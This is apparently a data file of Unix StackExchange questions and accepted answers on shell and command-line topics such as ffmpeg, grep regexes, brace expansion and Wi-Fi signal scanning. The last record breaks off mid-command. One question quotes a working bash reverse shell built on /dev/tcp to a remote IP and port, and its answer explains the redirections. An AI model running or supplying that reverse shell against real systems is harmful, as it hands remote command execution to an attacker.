date
int64
1,220B
1,719B
question_description
stringlengths
28
29.9k
accepted_answer
stringlengths
12
26.4k
question_title
stringlengths
14
159
1,388,861,790,000
I have a video and I want to extract every 10th frame as I am getting way too many images. ffmpeg -i out1.avi -r 1 -f image2 image-%3d.jpeg How to extract images from video file?
If you want 1/10 of what you have now (when you use -r 1) then use -r 0.1 It will get 1 frame every 10 seconds instead of 1 frame every 1 second. ffmpeg -i out1.avi -r 0.1 -f image2 image-%3d.jpeg EDIT: If you really what every 10th frame from video then you can use select with modulo 10 ffmpeg -i out1.mp4 -vf "select=not(mod(n\,10))" -vsync vfr image_%03d.jpg but it may gives more images than before. If video has 25fps then -r 1 gives image every 25th frame. And if video has 60fps then gives image every 60th frame. So it gives less images then this code which get image every 10th frame.
How to extract every 10th frame from a video?
1,575,483,815,000
How can I record and play asciinema screen recordings in a LAN without internet connection? The tool uploads the recordings per default to the asciinema website but I want to keep it local and run the player on a local webserver.
Just pass asciinema rec a file name as an argument, in which case it will simply save the recording to the local file and not try to upload it to the server. For example: $ asciinema rec demo.cast You can then play the recording locally (on the terminal) with: $ asciinema play demo.cast And finally upload it with: $ asciinema upload demo.cast See the asciinema usage docs for more details on each of these. You mentioned hosting the recording in your own server. In that case, you might want to look at setting your own asciinema web app instance, which you need to run on your server in order to host screencasts you upload. That page has a link to the web app install guide (which by default runs in a Docker container.) Once you have that up and running, you can configure your local asciinema to upload to your server rather than the public one in asciinema.org. Alternatively, you can simply host the asciinema player along with the *.cast files in a webserver and embed them directly into an HTML page, which sounds like you are looking for, as there is no asciinema upload step involved. See these instructions for standalone usage of the asciinema-player app.
How to use asciinema offline?
1,575,483,815,000
It is easy to find that ext2 filesystem labels can be set with tune2fs and e2label. GParted GUI offers to give partition labels when creating partitions of any type, but not to change the label of an existing partition. I am only interested in MBR partitions (not GPT) and preferably console tools. In particular, I am using the JFS filesystem. Can I give it a label to be used in /etc/fstab ? Human-readable label, not the GUID?
Compare the description of an MBR partition table entry with the description of a GPT/GUID partition entry. You'll see that while the GPT/GUID partition has dedicated locations to have both an "unique partition GUID" and a "partition name", there none of those available for MBR. So you just can't do this on MBR, it's available only for GPT. There's still an unique 32bits identifier for the whole MBR (at position 0x1B8) that might be usable, along with the partition number. It can be changed using fdisk's expert options: # fdisk /dev/ram0 [...] Command (m for help): x Expert command (m for help): i Enter the new disk identifier: 0xdf201070 Disk identifier changed from 0xdeadbeaf to 0xdf201070. Expert command (m for help): r Command (m for help): w The partition table has been altered. Calling ioctl() to re-read partition table. Syncing disks. What you should probably use, like with tune2fs for ext2, is jfs_tune to label the filesystem. For example: # jfs_tune -L mylabel /dev/ram0p1 jfs_tune version 1.1.15, 04-Mar-2011 Volume label updated successfully. # blkid |grep ram0 /dev/ram0: PTUUID="df201070" PTTYPE="dos" /dev/ram0p1: LABEL="mylabel" UUID="e1805bac-44fb-4f4e-860b-64a1d303400f" TYPE="jfs" PARTUUID="df201070-01" All "variables" output by blkid are probably usable in /etc/fstab, you should do tests.
How to label a partition in Linux?
1,575,483,815,000
I'm doing a project regarding RSSI and I have to retrieve the signal level of a particular WiFi SSID that I'm working on using the Linux command line. I've made use of the iwlist scanning command but I just couldn't get it to display the values that I want by using grep to print only the SSID name, quality and signal level. Commands that I've tried that didn't give me the results I wanted: iwlist INTERFACE scanning essid SpecificESSID | grep Signal iwlist INTERFACE scanning essid SpecificESSID | grep ESSID,Signal iwlist INTERFACE scan | grep 'ESSID:"SpecificESSID"\|Signal level' - This almost worked but it displayed other networks' signal level as well and I only need one specific network information.
First, iwlist is the old command, there's the newer iw command with more features. If the "SSID you are working on" is the access point (AP) you are currently connected to, use iw wlan0 station dump pick the value(s) you are interested in (say, average signal strength), and then something like iw wlan0 station dump | grep 'signal avg:' For the currently connected AP, you actually have more detailed information than for all APs. If you want signal strength for all visible APs, do something like iw wlan0 scan | egrep 'SSID|signal' You can post-process this for SSIDs you are interested in. Say you want SSID1 and SSID2, then you can do iw wlan0 scan | egrep 'SSID|signal' | egrep -B1 'SSID1|SSID2' The -B1 displays the line before the match, because in the scanning output, the signal strength comes before the SSID.
Retrieving specific SSID's Name, Quality and Signal Level using iwlist
1,575,483,815,000
Consider these wget codes: wget -P ~/ https://raw.githubusercontent.com/user/repo/branch/papj.sh wget -P ~/ https://raw.githubusercontent.com/user/repo/branch/nixta.sh Is there any elegant way to unite different terminals of the same basic URL as above, into one line instead 2 or more? Pseudocode: wget -P ~/ https://raw.githubusercontent.com/user/repo/branch/papj.sh||nixta.sh
As wget accepts several URLs at once this can be done using brace expansion in bash: wget -P ~/ https://raw.githubusercontent.com/user/repo/branch/{papj.sh,nixta.sh} (or even wget -P ~/ https://raw.githubusercontent.com/user/repo/branch/{papj,nixta}.sh but this only works for well-suited names of course).
Uniting urls for a download utility (like wget) in one line
1,575,483,815,000
The command echo {1..3}-{1,2} prints 1-1 1-2 2-1 2-2 3-1 3-2. I understand the way those curly braces can be used. But what actually are they? Is it the job of sh / bash to parse/expand them and deliver the expanded version to the executed program? If so, what other tricks can it do and is there a specification? Also, is there a name for it? Is ls *.txt handled in a similar way internally? Is there a way to achieve an n-times repetition of an argument? Like (not working, of course, only a concept): cat test.pdf{*3} ⇒ cat test.pdf test.pdf test.pdf ?
They are called brace expansion. It is one of several expansions done by bash, zsh and ksh, filename expansion *.txt being another one of them. Brace expansion is not covered by the POSIX standard and is thus not portable. You can read on this in bash manual. On @Arrow's suggestion: in order to get cat test.pdf test.pdf test.pdf with brace expansion alone, you would have to use this "hack": #cat test.pdf test.pdf cat test.pdf{,} #cat test.pdf test.pdf test.pdf cat test.pdf{,,} #cat test.pdf test.pdf test.pdf test.pdf cat test.pdf{,,,} Some common uses: for index in {1..10}; do echo "$index" done touch test_file_{a..e}.txt Or another "hack" to print a string 10 times: printf -- "mystring\n%0.s" {1..10} Be aware that brace expansion in bash is done before parameter expansion, therefore a common mistake is: num=10 for index in {1..$num}; do echo "$index" done (the ksh93 shell copes with this though)
How does curly brace expansion work in the shell?
1,575,483,815,000
I'm facing some trouble with the date command. The following execution issues an error: danilo@desktop:~$ x=$(date -d "+60 seconds"); dt=$(date -d "$x") date: invalid date ‘Mo 11. Sep 09:07:05 CEST 2017’ This is strange, because it works in other computers I tested. Even this: danilo@desktop:~$ x=$(date); dt=$(date -d "$x") date: invalid date ‘Mo 11. Sep 09:06:43 CEST 2017’ Produces an error. What is the reason for this error? Is it the timezone settings? How can I make it work?
The default format for your locale is not supported as input to date. The solution is to use some standard format. For example: x=$(date -d "+60 seconds" +%s); dt=$(date -d "@$x") +%s tells date to return a standard Unix format: seconds-since-epoch. The @ sign in date -d "@$x" tells date to interpret $x as seconds-since-epoch.
Parsing date with the contents of a previous date execution issues error
1,575,483,815,000
What's the best way to go to a directory that contains a specific file? (Assuming we are starting at the root of where we wish to search). I'm using Cygwin. SOLUTION: My final solution was to put this into my .bashrc file. jump2_func() { cd "$(find . -name $1 -printf %h -quit 2>/dev/null)" } alias jump2=jump2_func
cd "$(find . -name filename -printf %h -quit 2>/dev/null)" If no file with this name is found then cd changes into the home directory. If that is not wanted then you need something like this: dir="$(find . -name filename -printf %h -quit 2>/dev/null)" test -d "$dir" && cd "$dir"
Search for a specific file and change to its directory
1,575,483,815,000
I am doing some security research and I was wondering how the following snippet works on Unix based OS's: exec 5<>/dev/tcp/192.168.159.150/4444; cat <&5 | while read line; do \$line 2>&5 >&5; echo -n \$(pwd)'# ' >&5; done I am totally aware of what this code does (ie establish a reverse shell to 192.168.159.150 over port 4444) but I don't understand what these sections are doing: exec 5<> cat <&5 2>&5 >&5 And just in general how this how thing fits together to produce the shell that I see. Could anyone help explain this or point me in the right direction to understanding this? Thanks
Some parts of your question are answered here But This define new filedescriptor with number 5. BTW 0 is STDIN, 1 is STDOUT, 2 is STDERR filedescriptors Echo the information, which is received via TCP, IP 192.168.159.150, port 4444 Send STDERR and STDOUT to filehandler 5 i.e network
How is this command redirection working?
1,575,483,815,000
So basically I want to add these two cmd lines together ls *[Aa]* ls *[Bb]* I'm looking for a file that contains both A and B (lower or uppercase) and they can appear more than once. Here's what I tried: ls *[Aa]*&&*[Bb]*
Using brace expansion One method is to use brace expansion. Let's consider a directory with these files: $ ls 1a2a3 1a2b3 1b2A3 1b2b3 To select the ones that have both a and b in either case: $ ls *{[bB]*[aA],[aA]*[bB]}* 1a2b3 1b2A3 Improvement A possible issue is how brace expansion behaves if one of the options has no matching files. Consider a directory with these files: $ ls 1a2a3 1b2A3 1b2b3 Now, let's run our command: $ ls *{[bB]*[aA],[aA]*[bB]}* ls: cannot access '*[aA]*[bB]*': No such file or directory 1b2A3 If we don't like that warning message, we can set nullglob and it will go away: $ shopt -s nullglob $ ls *{[bB]*[aA],[aA]*[bB]}* 1b2A3 A limitation of this approach though, is that, if neither glob matches, then ls is run with no arguments and consequently it will list all files. Using extended globs Let's again consider a directory with these files: $ ls 1a2a3 1a2b3 1b2A3 1b2b3 Now, let's set extglob: $ shopt -s extglob And, let's use an extended glob to find our files: $ ls *@([bB]*[aA]|[aA]*[bB])* 1a2b3 1b2A3
File Globbing: adding *[Aa]* & *[Bb]* together [duplicate]
1,575,483,815,000
Is there an equation solver for the shell? For example, I enter input 1000=x^(1.02) and the shell solves for x.
Wolfram Mathematica has a command line interface, so you can use it in shell, but it is expensive.
Equation solver for the shell?
1,575,483,815,000
I have the following text in the data.txt file :MENU1 0. public 1. admin 2. webmail :SYNTAX ! opt1, ... : :ERROR1 Error #1, blah... blah.. blah... Please do ... :ERROR2 Error #2 ... and I want to use a regular expression (PERL syntax) to extract the part from :MENU1 to the next first :, but dropping MENU1 and the last : from the result. Been trying several regex's but in the closest solution I got I can't put the 'greedy' option to work and cant't discard the last ":" grep -Poz "^:MENU1\K[\w\W]*:" this works with grep ... but brings all the text until the last ":" ... I want only until the next first ":" after :MENU1: 0. public 1. admin 2. webmail   (note the final blank line)
The pattern *: will match everything until the last :. To stop at the next : you need *?:. E.g.: % grep -Poz '^:MENU1\K[\w\W]*?:' data.txt 0. public 1. admin 2. webmail : You can strip the first line by matching the newline before your \K. E.g.: % grep -Poz '^:MENU1\n\K[\w\W]*?:' data.txt 0. public 1. admin 2. webmail : To eat the empty line and the : you can match and discard that text. E.g.: % grep -Poz '^:MENU1\n\K[\w\W]*?(?=\n+:)' data.txt 0. public 1. admin 2. webmail next we can simplify your character class, to match on anything but :: % grep -Poz '^:MENU1\n\K[^:]*?(?=\n+:)' data.txt 0. public 1. admin 2. webmail And finally we can rewrite the initial part of the match: % grep -Poz '(?<=:MENU1\n)[^:]*?(?=\n+:)' data.txt 0. public 1. admin 2. webmail This is similar to what @terdon came up with, but this takes care of the blank lines without another call to grep. This final regex makes use of look-around assertions. The (?<=pattern) is a look-behind assertion that lets you match the pattern but not include it as part of the output. The (?=pattern) is a look-ahead assertion and lets us match on the trailing pattern without including it in the output.
grep regular expression solution (greedy not working)
1,575,483,815,000
I might be mistaken here, but I was watching someone navigate using the cd command, and without actually executing it, they were able to show the folder contents of the current folder. So if I type cd Downloads/Stuff then, without pressing enter, can I list the content of the Download/Stuff folder?
It's the programmable completion feature of the shell. You can simply press the TAB key twice to gain this behavior. Imagine you type cd Downkoads/St and then press the TAB key. St will be completed to Stuff if it is the only folder starting with St. If there are other folders starting with St in there, you will get a list of them by pressing TAB twice. For example: $ cd Downloads/St<tab><tab> Stuff/ Stage/ Start/ Another example: When you type cd Downkoads/ and then press the TAB key twice, everything you can cd to will be listed: $ cd Downloads/St<tab><tab> Stuff/ Stage/ Start/ Otherfolder/
Listing folder contents during cd command
1,575,483,815,000
I'm writing a simple desktop initiation script which waits for disk idle, and then launches next external program (like Firefox, Skype or conky) using &, like: ps cax | grep conky > /dev/null if [ $? -eq 0 ]; then echo "Conky is already running." else wait-for-disk-idle sda conky & fi That's easy. The problem is that some programs spew a lot of debug output to the terminal, which gets mixed with the messages produced by my initialization script. The question: Is there any way to asynchronously launch an external program so that its standard output is discarded? What I already tried: conky & >/dev/null 2>/dev/null bash -c conky & The correct answer: bash -c "conky >/dev/null 2>/dev/null &"
You probably want to discard any STDERR output as well. You can do both like so: conky > /dev/null 2>&1 & This statement essentially tells the shell to do the following: conky > /dev/null - redirect all standard output to /dev/null 2>&1 - Redirect standard error to where standard output is currently pointing. Because of the previous redirect, you standard output is pointing to /dev/null, so standard error will follow. & - Run this in a sub-shell (background). Thanks to @alexis for pointing out that my description for & wasn't quite precise: (a) Every external command must be run after a (v)fork, not just background processes. (b) Backgrounded processes are not run in a sub-shell, but executed immediately after the fork. The real difference when a process is backgrounded is that the invoking shell doesn't immediately wait(2) for it (but prints a prompt and awaits user input). When redirecting output, Bash reads the redirects in order, from left to right. Bash also treats the '&' as a command separator, which can be used anywhere ';' would normally be used. What you were doing was telling bash Run conky in the background. More specifically, fork the process and run it in a sub-shell, asynchronously, and return control of the terminal to the user. Bash considers this a new command - this is the same as running >/dev/null on the prompt with nothing preceding the redirect. Nothing happens. Redirect the standard error to /dev/null from the nonexistent command.
How to asynchronously launch external program from cli and discard its output?
1,575,483,815,000
When typing a complicated command that started on the command line in Bash, how do I switch to editing it with ViM?
There is a readline command, called edit-and-execute-command tied to the sequence C-x C-e, that invokes your editor with the current content of the command line for editing. When you exit the editor the command is executed.
How to switch to editing command in text editor [duplicate]
1,575,483,815,000
I'm using this command to recursively generate a SHA-512 hash for each file in a directory hierarchy: find . -type f -exec openssl sha512 {} \; I'd like to sort the files in lexicographical order before generating the hashes. I can use sort like this: find . -type f | sort but I'm not sure how to then pipe the sorted file list into openssl. I tried this: find . -type f | sort | openssl sha512 but this generates a single hash of the entire output of sort, whereas I want a hash for each individual file. find in some versions of bash includes an -s option ("Cause find to traverse the file hierarchies in lexicographical order"), but this isn't available in my version of find. Many thanks in advance for your help!
You can use xargs to get what you want. find . -type f -print0 | sort -z | xargs -0 -n1 openssl sha512 The -n1 option tells xargs to only allow one argument to be given to the openssl command. The -print0, -z and -0 options prevent the pipeline from breaking if there are "problem" characters (like an embedded newline) in the filenames.
Sort the output of find before piping to openssh
1,575,483,815,000
-bash-3.00$ ./p4 -V -bash: ./p4: Invalid argument What does "Invalid argument" mean in Unix? More details: p4 is an executable in the current directory. p4 actually refers to perforce. The option -V is supposed to display the version details. Solaris 10 is the OS. p4 has executable permissions (chmod +x p4) The official documentation wasn't very helpful in my case.
I figured it out! I was running an x86 binary on a SPARC machine. Similar question on SO On Solaris, when you try running a SPARC binary on an x86 platform (or vice versa), Invalid argument is the error you get.
What does "Invalid argument" mean in Solaris?
1,575,483,815,000
I tried to understand the usage of xargs and did the following experiment. ls | xargs | touch I want to refresh the files dates and directoris in the curent directory. Though it is a bit silly,for I could use a simpler form to achieve the same effect. In my mind, xargs reads from the STDIN and turn it into the arguments for the other command(/bin/echo by default if the command is not specified). Am I misunderstanding something? It failed and I am wondering why.
It needs to be like this: ls | xargs touch The xargs command runs the touch command with a number of strings read from stdin. In your case, stdin for xargs is the output end of the pipe from ls. The way you had the command: ls | xargs | touch xargs had no command to run against the strings (filenames) it would read from stdin. In that case, xargs simply prints each file name, and touch gets the list of file names on its standard input. But touch doesn't read from its standard input, and since you didn't give it any arguments, it should have printed an error message like: touch: missing file operand Try `touch --help' for more information. (which you should have mentioned in your question).
Why did using xargs fail in this case?
1,575,483,815,000
I am using Ubuntu 10.04, I know I can start NVIDIA x server settings by choose : System -> Preference -> Monitors on the top bar. But how can I start the NVIDIA x server settings window by run a command from terminal? What is that command?
I guess it is: nvidia-settings
How to start nvidia x server settings from command line?
1,575,483,815,000
I'm trying to install some software from the command line. There is a file called "config.sub". Am I supposed to use this for something? I haven't been able yet to find out by searching online what this file is supposed to do. I think part of the deal is I don't know how to ask the question correctly.
config.sub is one of files generated by autoconf. Autoconf documentations states that it converts system aliases into full canonical names. In short - you don't have to worry about it unless you're autoconf developer.
What is the function/point of "config.sub"
1,575,483,815,000
clear clears the screen of the terminal. Is there any command that can restore the original screen contents from before clear was run, effectively undoing that clear?
If you mean undo, then there is ★nothing. Except, you can go through the command history and re-run a command. If the command is idempotent, then you will get the same result. Footnotes: ★ nothing unless you use some sort of logging system. This logging may be part of a terminal program, or separate. It is not part of the kernel called Linux.
How can we undo the clear command in Linux?
1,575,483,815,000
While researching more in-depth information about Bash subshells, I ran into an interesting execution that I would like to understand why it works. The execution involves assigning a string to a variable that is then used when man is called, link to original example. I have already read about why the specific variable LESS is used in that example (man has less as its default pager in many distros), what I do not understand is how a variable assignment followed by a command execution works without any kind of separating metacharacters. LESS=+/'OPTIONS' man man opens the man page for the man command directly under the OPTIONS section. It works with files opened directly with less too (which leads me to believe that the LESS variable is used by less the same way as doing a regex search within a less "session"). The LESS variable is not being exported, it's never saved in the current shell environment (executing echo $LESS returns nothing) so how is less capturing that value? Why does that work, but not something like foo='hello' echo $foo? This case only works when a command separator (;) is included between the variable assignment and the command execution. I even tried foo=+'hello' echo $foo in case =+ did something I was not aware in Bash, but no changes in the output. Any explanations or reading material are welcome!
This is a standard feature. You can set the variable when launching the command and then the variable will be set for the command. It also works in the example you show, foo='hello' echo $foo. The problem is that you are testing the wrong way. When you run this: foo='hello' echo $foo The shell will expand the variable before running the command. Since foo is not actually set when you launch it, that becomes echo (echo nothing). You can see this with set -x: $ set -x $ foo='hello' echo $foo + foo=hello + echo Now, compare that to what happens if you instead use a little script so that the variable is not seen by your shell: $ cat ~/scripts/foo.sh + cat /home/terdon/scripts/foo.sh #!/bin/bash echo "The value of foo is:$foo" Use that to echo the variable and you get: $ foo='hello' ~/scripts/foo.sh + foo=hello + /home/terdon/scripts/foo.sh The value of foo is:hello You can do the same thing if you call bash -c and enclose the command you give it in single quotes so the variable will be protected and not expanded by your current shell before calling bash -c: $ foo='hello' bash -c 'echo $foo' hello While this fails because the double quotes mean that $foo is being expanded before bash -c ever sees it: $ foo='hello' bash -c "echo $foo" $ The behavior is documented in man bash in the "ENVIRONMENT" section: The environment for any simple command or function may be augmented temporarily by prefixing it with parameter assignments, as described above in PARAMETERS. These assignment statements affect only the envi‐ ronment seen by that command. It's also described in detail in the manual: 3.7.1 Simple Command Expansion
Command-line variable assignment and command execution
1,575,483,815,000
Is there a command or system call for listing all the abstract unix sockets currently open? Update: It was suggested that I use netstat -x, which theoretically works, but does not list the names of the abstract sockets, only those with paths. bash-5.0$ netstat -xeW Active UNIX domain sockets (w/o servers) Proto RefCnt Flags Type State I-Node Path unix 2 [ ] STREAM CONNECTED 3959158 unix 2 [ ] STREAM CONNECTED 3961068 unix 3 [ ] STREAM CONNECTED 3965008 unix 3 [ ] STREAM CONNECTED 3967192 /run/spire/writable/agent.sock
Abstract sockets Their path name starts with the NUL characters, making their path length 0. They can use the remaining 107 characters to define a unique identifier, which other programs can use to connect. they are not represented in the file system. Most unix come with lsof (list of open files) command. If not you can easily add it. lsof -U upowerd 1604 root 5u unix 0xffff88005af5f400 0t0 18631 type=STREAM colord 1614 colord 10u unix 0xffff880034d3f400 0t0 18170 type=STREAM systemd 2009 root 13u unix 0xffff88005a293000 0t0 21213 /run/user/0/systemd/notify type=DGRAM systemd 2009 root 14u unix 0xffff88005a293c00 0t0 21214 /run/user/0/systemd/private type=STREAM On Linux, when showing abstract namespace paths, null bytes are converted to @. Older tool versions may not handle zero bytes properly upstart 1525 lightdm 7u unix 0xffff880034b99800 0t0 17301 @/com/ubuntu/upstart-session/111/1525 type=STREAM You'll be able to list all the unix domain sockets on your system. the 'ss' command can also show sockets and abstract sockets. again abstract sockets will be prefixed with @ Good Luck!
Is there a command to list all abstract unix sockets currently open?
1,575,483,815,000
After a command like: $ usermod -e <yesterday> -f <tomorrow> bea Bea's account will be expired, but still active (until tomorrow). What's the difference? What could happen yesterday and can't happen today? And what can happen today but not after tomorrow?
usermod -e normally takes a date as a parameter: if you specify usermod -e 2019-12-31 joeuser, then Joe User's account will only work until the end of the year, and no more, unless an administrator re-enables the account, either by setting a new account expiration date, or by using usermod -e "" joeuser to allow the account to be enabled indefinitely with no scheduled expiration time. You can also use usermod -e 1 joeuser to disable the account immediately: this will effectively set the account to expire on Jan 2, 1970 which is firmly in the past. Disabling an account like this works for all authentication mechanisms: even if the user uses SSH keys, smart card, RSA SecurID or any other authentication mechanism, that account will not accept logins. When the account is disabled like this, there is nothing the user can do alone to re-enable it: the only recourse is to contact a system administrator. Note that this account expiration is completely separate from password expiration. usermod -f, on the other hand, expects as a parameter a number of days. This is a clock that starts ticking when the user's password expires: for example, if you set Joe User's password to expire in 90 days (passwd -x 90 joeuser) and usermod -f 14 joeuser, then once it has been 90 days from the last time Joe User changed his password, Joe will have exactly 14 days of time when the system will force him to change his password if he attempts to log in. If he does that, the new password will again be valid for 90 days. If Joe won't log in within those 14 days, the account will be locked and Joe will need to contact an administrator to unlock it if he needs to access the system still. Note that historically passwd -l used to mean locking the account; with the modern Linux PAM implementation, it actually means locking the password only. If the account has SSH keys or some other authentication methods configured, they will still be allowed even after a passwd -l. The current recommended way to completely disable an account without removing it or changing its configuration (so that it can be re-enabled exactly as it used to be, if desired) is usermod -e 1 <username>. This is guaranteed to be equally effective with both new and old PAM implementations. Changing the user's shell to /bin/false or to a command that displays a message and then exits, will also work to disable command-line login for any authentication method, but as a side effect, the information about the user's current shell will be lost. Also, if the system has other services like email or FTP that use the system passwords for authentication, changing the shell may not disable access to them.
Difference between expired account and inactive account
1,575,483,815,000
I tried using this command to compute number of lines changed between two files: diff -U 0 file1 file2 | grep ^@ | wc -l My problem with this command is that if one file has only one line, and the other file has 100 lines, the output is still just 1. What command would give me the total number of lines changed, including the total extra lines in one file?
Looking for lines starting with @ gives you the number of blocks of changes that diff found. They would often be more than one line. As it happens, there's a tool to count the statistics of a diff: diffstat (web site, man page). Count insertions and deletions: $ diff -u test1 test2 | diffstat test2 | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) Combine insertions and deletions in the same block to just single "modification" operations: $ diff -u test1 test2 | diffstat -m test2 | 2 -! 1 file changed, 1 deletion(-), 1 modification(!) Also, you could use diffstat -t to get a tabular output of just the numbers of modified lines. The test files: $ cat test1 a b c d $ cat test2 a x d
Given two files, how do I find the total number of line changes?
1,575,483,815,000
I have seen separate answers for all the little pieces of my question, I looked really hard, but it still doesn't seem to make any sense. A little history of how this happened. Yesterday by using randomly using ls in my root directory as root, I discover a file called dead.letter. Said file contains warnings that seem pretty ominous: Device: /dev/sda [SAT], 8 Currently unreadable (pending) sectors Device: /dev/sda [SAT], 8 Offline uncorrectable sectors Those two warnings repeat for a final file size of 53346 (bytes, I guess? This is what the ls command said). I check online, search engines inform me that my hard drive is dying. OK, good, I know what's going on. Except that I checked my hard drive's health two weeks ago and it was fine, and when I check it now through smartctl -H /dev/sda it tells me overall health is good. Even weirder, why is it in a dead.letter file? From what I understand it's a file that happens when you abort a mail you're currently writing, so wtf? The dead.letter file, says the stat command, has not been modified since January 18th. Was this a one-time event? So here's my question: is my hard drive fine or is it dying in a really sneaky way? I have no idea what's going on. I run a Fedora 24/Gnome Shell on a 2012 Asus U36SG. Filesystem is all ext4 on LVM2… I think. I hope this is enough information!
The dead.letter file is created by mail clients when they cannot send email. It's likely you don't have any mail subsystem installed on your machine. The date of the file corresponds to the date the mail was attempted. On 18th January it looks like smartctl tried to warn you of 8 sectors that couldn't be read. This is a warning sign that the disk may be dying but it's not a definite marker. I'd start saving for a replacement, though. You confirmed that the disk has been more recently checked and was reported to be fine. What's happened here is that you wrote new data to those sectors, the disk failed to write them, and silently remapped them to dedicated spare sectors elsewhere on the disk. Three are now no outstanding faulty sectors. As the disk gets older and more sectors need remapping, eventually the spares will get filled up and real data will be lost. It's just a matter of time. Ensure you have got backups - or that you can afford to lose any or all of your data either in one big go out subtly so you don't really notice the corruption at first.
dead.letter file warns me about uncorrectable sectors I can't find
1,575,483,815,000
My instructor says to use a pipe to apply a text file, which consists a list of test cases, to a working program that takes test case from the input file. Say i have test_cases.txt my_program //my java program after compliation and when I did this java my_program | test_cases.txt it gives [1]+ Stopped java my_program | test_cases.txt Not sure how to use pipe...
First of all, a pipe connects two processes, not files (including text files), such that the output of one goes to the input of the other. The presumption is that the process "generating" the output sends it to STDOUT, which becomes the source for the pipe, and that the process "receiving" the input reads it from STDIN, which becomes the destination of the pipe. You cannot connect a pipe to a text file, or any other file, only to processes. Second, when using a pipe the process on the left side of the pipe is the one that uses STDOUT, and the process on the right side of the pipe uses STDIN. Therefore, your attempted command would be trying to send the output of my_program to the pipe, not reading from it. If you properly presented the instructions you were given, then it can't work anyway. The instructions ends with "... a working program takes test cases from the input file." If the program takes input from a file, then it is not reading from STDIN, and would ignore the data from the pipe anyway. To make it work with a pipe, my_program has to be written to read from the STDIN, as in expecting you to type the test cases by hand at a prompt. Then you could rewrite the command line as cat text_cases.txt | jave my_program cat is a process that will read the text file and send its contents to STDOUT, then my_program would "read" the data from STDIN using the pipe instead of you typing it manually. Since I don't know how java connects with pipes, this is based on the presumption that it will behave in a standard way, since the instructor asked you to use that method. IMHO it would be better, as in less resource usage, to use redirection than a pipe. java my_program < test_cases.txt That is, unless this is one step that will be included in a larger chain of processes later in the course where using a pipe will become necessary.
How to use pipe to apply a text to a program
1,575,483,815,000
I would like to output a series of space-delimited words in a tabular format, filling line by line so that nothing exceeds the terminal's width but the available space is used optimally, like this: +-----------------------------------------------+ |polite babies embarrass rightful | |aspiring scandalous mut disgusted | |bell deeply writer jumbled | |respired craggy | (the box illustrates the terminal's width - it is not part of the output) The commands that spring to mind are fold and column in a pipeline like this: $ fold words -s -w $COLUMNS | column -t This almost works but the output ends up wider than $COLUMNS (the terminal width) because it is first folded within that width and then the whitespace is stretched to line them up. What I need is the effect of both in one. Are there any command-line tools (or shell built-ins) that can do this?
To produce equally spaced columns, you could use BSD rs (also ported to Debian and derivatives (at least) and available as a package there) or BSD column (in the bsdmainutils package on Debian): tr -s '[:space:]' '[ *]' | rs -w "$COLUMNS" tr -s '[:space:]' '[\n*]' | column -xc "$COLUMNS" Example (the vertical line is to show the edge of that 60 column wide screen, it is not part of the output): $ lorem -w 30 | tr -s '[:space:]' '[ *]' | rs -w60 earum aspernatur ipsa sed ┃ quod sit esse quisquam ┃ animi reprehenderit porro et ┃ delectus neque esse quia ┃ pariatur amet iste voluptatem ┃ provident praesentium et sint ┃ quo animi doloribus veritatis ┃ iusto alias ┃ With rs, You can add the -z option to reduce the space between the columns, but that does not optimise the number of columns accordingly. For instance, on the above, it gives (with rs -zw60): earum aspernatur ipsa sed ┃ quod sit esse quisquam ┃ animi reprehenderit porro et ┃ delectus neque esse quia ┃ pariatur amet iste voluptatem ┃ provident praesentium et sint ┃ quo animi doloribus veritatis ┃ iusto alias ┃ Instead of: earum aspernatur ipsa sed quod ┃ sit esse quisquam animi reprehenderit ┃ porro et delectus neque esse ┃ quia pariatur amet iste voluptatem ┃ provident praesentium et sint quo ┃ animi doloribus veritatis iusto alias ┃ It also doesn't work with multi-byte characters or 0-width or double-width characters. By default, it leaves at least 2 spaces between the columns. You can change it to 1 with -g 1.
How can a space-delimited list of words be folded into tabular columns that fit in the terminal's width
1,575,483,815,000
I executed the following line: which lsb_release 2&>1 /dev/null Output: error: no null in /dev When I verified the error using the ls /dev/null command, null was present in /dev. Why is this error occurring? I could not decipher the problem. UPDATE I just tried the above which command on someone else's system, it worked perfectly without generating the error that I got.
First of all, redirections can occur anywhere in the command line, not necessarily at the end or start. For example: echo foo >spamegg bar will save foo bar in the file spamegg. Also, there are two versions of which, one is shell builtin and the other is external executable (comes with debianutils in Debian). In your command: which lsb_release 2>&1 /dev/null by 2&>1, you are redirecting the STDERR (FD 2) to where STDOUT is (FD 1) pointed at, not to /dev/null and this is done first. So the remaining command is: which lsb_release /dev/null As there is no command like /dev/null, hence the error. Note that, this behavior depends on whether which is a shell builtin or external executable, bash, ksh, dash do not have a builtin and use external which and that simply ignores the error, does not show any error message. On the other hand, zsh uses a builtin which and shows: /dev/null not found So presumably, that specific error is shown by the builtin which of the shell you are using. Also, it seems you wanted to just redirect the STDERR to /dev/null if lsb_release does not exist in the PATH i.e. which shows an error. If so, just redirect the STDERR to /dev/null: which lsb_release 2> /dev/null
no null in /dev error
1,575,483,815,000
Lately I hit the command that will print the TOC of a pdf file. mutool show file.pdf outline I'd like to use a command for the epub format with similar simplicity of usage and nice result as the above for pdf format. Is there something like that?
.epub files are .zip files containing XHTML and CSS and some other files (including images, various metadata files, and maybe an XML file called toc.ncx containing the table of contents). The following script uses unzip -p to extract toc.ncx to stdout, pipe it through the xml2 command, then sed to extract just the text of each chapter heading. It takes one or more filename arguments on the command line. #! /bin/sh # This script needs InfoZIP's unzip program # and the xml2 tool from http://ofb.net/~egnor/xml2/ # and sed, of course. for f in "$@" ; do echo "$f:" unzip -p "$f" toc.ncx | xml2 | sed -n -e 's:^/ncx/navMap/navPoint/navLabel/text=: :p' echo done It outputs the epub's filename followed by a :, then indents each chapter title by two spaces on the following lines. For example: book.epub: Chapter One Chapter Two Chapter Three Chapter Four Chapter Five book2.epub: Chapter One Chapter Two Chapter Three Chapter Four Chapter Five If an epub file doesn't contain a toc.ncx, you'll see output like this for that particular book: book3.epub: caution: filename not matched: toc.ncx error: Extra content at the end of the document The first error line is from unzip, the second from xml2. xml2 will also warn about other errors it finds - e.g. an improperly formatted toc.ncx file. Note that the error messages are on stderr, while the book's filename is still on stdout. xml2 is available pre-packaged for Debian, Ubuntu and other debian-derivatives, and probably most other Linux distros too. For simple tasks like this (i.e. where you just want to convert XML into a line-oriented format for use with sed, awk, cut, grep, etc), xml2 is simpler and easier to use than xmlstarlet. BTW, if you want to print the epub's title as well, change the sed script to: sed -n -e 's:^/ncx/navMap/navPoint/navLabel/text=: :p s!^/ncx/docTitle/text=! Title: !p' or replace it with an awk script: awk -F= 